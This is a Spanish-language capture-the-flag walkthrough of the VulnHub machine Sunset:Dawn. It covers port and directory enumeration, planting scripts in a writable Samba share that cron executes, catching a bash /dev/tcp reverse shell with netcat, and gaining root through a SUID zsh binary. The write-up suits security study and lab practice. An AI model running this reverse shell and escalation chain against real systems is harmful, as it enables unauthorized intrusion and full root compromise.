[VULNHUB] Sunset:Dawn

Hoy vamos a hackear la maquina de Vulnhub llamada Sunset:Dawn. Podeis descargarla desde el siguiente enlace: Sunset-Dawn

Video


Enumeration


Empezamos con un nmap para ver que puertos tiene abiertos.

~ > nmap -A -p- 192.168.1.29 
Starting Nmap 7.70 ( https://nmap.org ) at 2020-09-01 10:29 CEST
Nmap scan report for 192.168.1.29
Host is up (0.0011s latency).
Not shown: 65531 closed ports
PORT     STATE SERVICE     VERSION
80/tcp   open  http        Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Site doesn't have a title (text/html).
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 4.9.5-Debian (workgroup: WORKGROUP)
3306/tcp open  mysql       MySQL 5.5.5-10.3.15-MariaDB-1
| mysql-info: 
|   Protocol: 10
|   Version: 5.5.5-10.3.15-MariaDB-1
|   Thread ID: 14
|   Capabilities flags: 63486
|   Some Capabilities: ConnectWithDatabase, DontAllowDatabaseTableColumn, 
FoundRows, LongColumnFlag, SupportsTransactions, Speaks41ProtocolOld, 
Speaks41ProtocolNew, ODBCClient, IgnoreSigpipes, InteractiveClient, 
IgnoreSpaceBeforeParenthesis, SupportsLoadDataLocal, Support41Auth, 
SupportsCompression, SupportsAuthPlugins, SupportsMultipleStatments, 
SupportsMultipleResults
|   Status: Autocommit
|   Salt: \qEEgYh|X#Cf[tX:V&We
|_  Auth Plugin Name: 96
Service Info: Host: DAWN

Host script results:
|_clock-skew: mean: 1h39m39s, deviation: 2h18m34s, median: 19m38s
|_nbstat: NetBIOS name: DAWN, NetBIOS user: , NetBIOS MAC:  
(unknown)
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.9.5-Debian)
|   Computer name: dawn
|   NetBIOS computer name: DAWN\x00
|   Domain name: dawn
|   FQDN: dawn.dawn
|_  System time: 2020-09-01T04:49:14-04:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2020-09-01 10:49:14
|_  start_date: N/A

Service detection performed. Please report any incorrect results at 
https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 17.85 seconds
Exploramos un poco mas el puerto 80 para ver si encontramos algun directorio interesante.

~ > gobuster -u http://192.168.1.29 -w 
/usr/share/wordlists/SecLists/Discovery/Web-Content/common.txt

=====================================================
Gobuster v2.0.1              OJ Reeves (@TheColonial)
=====================================================
[+] Mode         : dir
[+] Url/Domain   : http://192.168.1.29/
[+] Threads      : 10
[+] Wordlist     : 
/usr/share/wordlists/SecLists/Discovery/Web-Content/common.txt
[+] Status codes : 200,204,301,302,307,403
[+] Timeout      : 10s
=====================================================
2020/09/01 10:30:38 Starting gobuster
=====================================================
/.hta (Status: 403)
/.htaccess (Status: 403)
/.htpasswd (Status: 403)
/index.html (Status: 200)
/logs (Status: 301)
/server-status (Status: 403)
=====================================================
2020/09/01 10:30:39 Finished
=====================================================
Vemos que hay un directorio llamado logs. Accedemos a el: http://192.168.1.29/logs/ Hay varios ficheros .log, nos descargamos el management.log Le echamos un vistazo.

--SNIP--
2020/09/01 04:48:01 CMD: UID=0    PID=844    | /bin/sh -c chmod 777 
/home/dawn/ITDEPT/product-control 
2020/09/01 04:48:01 CMD: UID=0    PID=851    | /usr/sbin/CRON -f 
2020/09/01 04:48:01 CMD: UID=0    PID=850    | /bin/sh -c chmod 777 
/home/dawn/ITDEPT/web-control 
2020/09/01 04:48:01 CMD: UID=0    PID=849    | /bin/sh -c 
/home/ganimedes/phobos 
2020/09/01 04:48:01 CMD: UID=0    PID=848    | /bin/sh -c chmod 777 
/home/dawn/ITDEPT/product-control 
2020/09/01 04:48:01 CMD: UID=33   PID=853    | /bin/sh -c 
/home/dawn/ITDEPT/web-control 
2020/09/01 04:48:01 CMD: UID=1000 PID=852    | /bin/sh -c 
/home/dawn/ITDEPT/product-control 
--SNIP
Podemos ver, que se ejecutan scripts llamados web-control y product-control que estan dentro de una carpeta llamada ITDEPT. En el escaneo inicial vimos que Samba estaba abierto, con lo cual le echamos un vistazo.

~ > smbclient -L 192.168.1.29
Enter WORKGROUP\sml's password: 

	Sharename       Type      Comment
	---------       ----      -------
	print$          Disk      Printer Drivers
	ITDEPT          Disk      PLEASE DO NOT REMOVE THIS SHARE. IN CASE YOU 
ARE NOT AUTHORIZED TO USE THIS SYSTEM LEAVE IMMEADIATELY.
	IPC$            IPC       IPC Service (Samba 4.9.5-Debian)
Reconnecting with SMB1 for workgroup listing.

	Server               Comment
	---------            -------
Vemos que hay una carpeta llamada ITDEPT (como la que aparece en management.log). La vemos...

~ > smbclient \\\\192.168.1.29\\ITDEPT
Enter WORKGROUP\sml's password: 
Try "help" to get a list of possible commands.
smb: \> dir
  .                                   D        0  Sat Aug  3 05:23:20 2019
  ..                                  D        0  Sat Aug  3 05:21:39 2019

		7158264 blocks of size 1024. 3500864 blocks available
smb: \> 
Parece que no hay nada dentro. Vamos a crear los ficheros product-control y web-control que contendran un comando para facilitarnos una reverse shell si se ejecutan. Lo subiremos a la carpeta ITDEPT y esperaremos...

Low Shell



~ > nano product-control
~ > cp product-control web-control                                        21s
~ > cat product-control 
#!/bin/bash
bash -i >& /dev/tcp/192.168.1.59/7777 0>&1
Los subimos a la carpeta ITDEPT.

~ > smbclient \\\\192.168.1.29\\ITDEPT
Unable to initialize messaging context
Enter WORKGROUP\sml's password: 
Try "help" to get a list of possible commands.
smb: \> put web-control
putting file web-control as \web-control (6,0 kb/s) (average 6,0 kb/s)
smb: \> put product-control
putting file product-control as \product-control (13,4 kb/s) (average 8,3 kb/s)
smb: \> ls
  .                                   D        0  Tue Sep  1 11:05:38 2020
  ..                                  D        0  Sat Aug  3 05:21:39 2019
  web-control                         A       55  Tue Sep  1 11:05:32 2020
  product-control                     A       55  Tue Sep  1 11:05:38 2020

		7158264 blocks of size 1024. 3500820 blocks available
smb: \>
Ponemos nc a la escucha.

~ > nc -nlvp 7777
listening on [any] 7777 ...
Y tras un rato...

~ > nc -nlvp 7777
listening on [any] 7777 ...
connect to [192.168.1.59] from (UNKNOWN) [192.168.1.29] 44558
bash: cannot set terminal process group (1241): Inappropriate ioctl for device
bash: no job control in this shell
www-data@dawn:~$ 

Privilege Escalation


Ahora que estamos dentro del sistema, miramos los ficheros SUID.

www-data@dawn:~$ python -c 'import pty;pty.spawn("/bin/bash")'
www-data@dawn:~$ find / -perm -4000 2>/dev/null
/usr/sbin/mount.cifs
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/bin/su
/usr/bin/newgrp
/usr/bin/pkexec
/usr/bin/passwd
/usr/bin/sudo
/usr/bin/mount
/usr/bin/zsh
/usr/bin/gpasswd
/usr/bin/chsh
/usr/bin/umount
/usr/bin/chfn
/home/dawn/ITDEPT
Vemos que esta zsh con SUID... el cual nos permitira elevar privilegios. Lo ejecutamos.

www-data@dawn:~$ /usr/bin/zsh
/usr/bin/zsh
#id
uid=33(www-data) gid=33(www-data) euid=0(root) groups=33(www-data)
# 

root.txt


Por ultimo, miramos la flag de root :)

dawn# cd /root
#ls
flag.txt  pspy64
#cat flag.txt
Hello! whitecr0wz here. I would like to congratulate and thank you for 
finishing the ctf, however, there is another way of getting a shell(very 
similar though). Also, 4 other methods are available for rooting this box!
flag{3a3e52f0a6af0d6e36d7c1ced3a9fd59}

End


Y con esto ya seriamos root de la maquina.